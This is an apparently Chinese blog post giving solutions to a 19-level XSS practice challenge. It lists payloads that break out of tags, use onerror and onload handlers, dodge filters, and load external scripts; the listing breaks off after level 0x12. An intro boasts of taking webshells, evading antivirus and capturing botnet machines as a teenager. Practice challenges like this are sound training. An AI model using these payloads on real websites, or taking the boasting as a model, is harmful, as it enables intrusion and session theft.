有意思的19道XSS题目
About
2
min read
(
2
Words
)
Reads
记得第一次接触xss这个概念是在高中,那个时候和一个好基友通过黑客X档案和黑客手册,第一次接触到了除了游戏以外的电脑知识,然后知道了,原来电脑除了玩游戏还可以搞这些,从此两人一发不可收拾的爱上了玩黑这方面的东西。
现在想起来,高中时期是在08年左右,那个时候的网络安全环境还蛮差。那个时候没什么计算机知识,跟着杂志直接用工具跑都拿到了蛮多的webshell,后来学的多了,自己会写一些壳过免杀,艳照门时候抓的肉鸡那就不要说了,嘿嘿!
XSS具体的概念就不在这解释了,做前端的童鞋们只要是稍微对安全这方面有过一点了解的,应该都是知道的。
这里有19道XSS的题目,网址是神通广大的”QQ群爸爸”给的。大家如果想加深对XSS这方面的了解,可以来挑战一下。看看能过几关斩几将!
挑战请戳:https://xss.haozi.me/
答案在下面给到,主要的思路大概是以下几种:
- payload外部js
- 绕过正则
- 闭合标签
- 转化编码:10HEX,16HEX etc.
- 创建错误执行JS
答案在下面
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
| 0x00: <script>alert(1)</script>
0x01: </textarea><script>alert(1)</script>
0x02: "><script>alert(1)</script>
0x03: <img src="" onerror=javascript:alert(1)>
0x04: <img src="" onerror=javascript:alert(1)>
0x05: --!><script>alert(1)</script>
0x06: type="image" src="xxx" onerror="alert(1)"
0x07: <body onload=alert(1)> (CRLF结尾)
0x08: </style /><script>alert(1)</script>
0x09: https://www.segmentfault.com.haozi.me/j.js
0x0A: https://www.segmentfault.com.haozi.me/j.js
0x0B: <script src="https://www.segmentfault.com.haozi.me/j.js"></script>
0x0C: <scripscriptt src="https://www.segmentfault.com.haozi.me/j.js"></scripscriptt>
0x0D:
* alert(1);*
** -->**
0x0E: <ſcript src="https://www.segmentfault.com.haozi.me/j.js"></script>
0x0F: ');alert('1
0x10: eval("alert(1)");
0x11: "),alert("1
0x12:
</script>
<script>
alert(1);
</script>
<script>
|